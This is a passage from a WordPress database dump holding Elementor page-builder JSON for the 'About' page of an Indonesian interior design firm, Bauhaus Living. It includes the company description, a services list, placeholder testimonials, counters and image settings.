right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"\\\"Let\'s turn your ideas into reality\\\"\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3870,4871,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3871,4871,'_elementor_pro_version','3.8.1'),(3872,4871,'_elementor_css','a:6:{s:4:\"time\";i:1695372643;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3873,4872,'_wp_page_template','elementor_header_footer'),(3874,4872,'_elementor_edit_mode','builder'),(3875,4872,'_elementor_template_type','wp-page'),(3876,4872,'_elementor_version','3.8.1'),(3877,4872,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\